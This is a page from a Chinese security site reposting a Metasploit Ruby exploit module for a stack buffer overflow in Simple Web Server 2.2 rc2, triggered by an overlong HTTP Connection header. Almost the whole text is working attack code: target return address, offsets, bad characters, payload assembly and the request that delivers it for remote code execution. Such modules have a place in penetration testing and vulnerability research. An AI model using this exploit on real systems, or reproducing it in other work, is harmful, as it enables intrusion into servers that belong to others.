首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Simple Web Server Connection Header Buffer Overflow
来源:http://www.metasploit.com 作者:juan 发布时间:2012-07-24  

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] }

 include Msf::Exploit::Remote::HttpClient

 def initialize(info={})
  super(update_info(info,
   'Name'        => "Simple Web Server Connection Header Buffer Overflow",
   'Description' => %q{
    This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user
    can send a long string data in the Connection Header to causes an overflow on the
    stack when function vsprintf() is used, and gain arbitrary code execution. The
    module has been tested successfully on Windows 7 SP1 and Windows XP SP3.
   },
   'License'   => MSF_LICENSE,
   'Author'      =>
    [
     'mr.pr0n', # Vulnerability Discovery and PoC
     'juan' # Metasploit module
    ],
   'References' =>
    [
     ['EDB', '19937'],
     ['URL', 'http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/']
    ],
   'Payload'  =>
    {
     'BadChars' => "\x00\x0a\x0d",
     'Space' => 2048,
     'DisableNops' => true,
     'PrependEncoder' => "\x81\xC4\x60\xF0\xFF\xFF", # add esp, -4000
    },
   'DefaultOptions' =>
    {
     'EXITFUNC' => "process",
    },
   'Platform' => 'win',
   'Targets'  =>
    [
     [
      'SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1',
      {
       'Ret' => 0x6fcbc64b, # call edi from libstdc++-6.dll
       'Offset' => 2048,
       'OffsetEDI' => 84
      }
     ]
    ],
   'Privileged'     => false,
   'DisclosureDate' => "Jul 20 2012",
   'DefaultTarget'  => 0))
 end

 def check
  res = send_request_raw({'uri'=>'/'})
  if res and res.headers['Server'] =~ /PMSoftware\-SWS\/2\.[0-2]/
   return Exploit::CheckCode::Vulnerable
  end

  return Exploit::CheckCode::Safe
 end

 def exploit

  sploit = payload.encoded
  sploit << rand_text(target['Offset'] - sploit.length)
  sploit << [target.ret].pack("V") # eip
  sploit << rand_text(target['OffsetEDI'])
  sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{sploit.length}").encode_string

  print_status("Trying target #{target.name}...")

  connect

  send_request_cgi({
   'uri'        => '/',
   'version'    => '1.1',
   'method'     => 'GET',
   'connection' => sploit
  })

  disconnect

 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ipswitch WhatsUp Gold 15.02 St
·EGallery PHP File Upload Vulne
·Dell SonicWALL Scrutinizer 9.0
·Photodex ProShow Producer v5.0
·SolarWinds Orion Network Perfo
·Symantec Web Gateway 5.0.2 (bl
·Atmail Email Server Appliance
·MyMp3 Player Stack .m3u DEP By
·httpdx 1.5.4 Remote HTTP Serve
·AlienVault OSSIM 3.1 Reflected
·ptunnel <= 0.72 Remote Denial
·Symantec Web Gateway 5.0.3.18
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved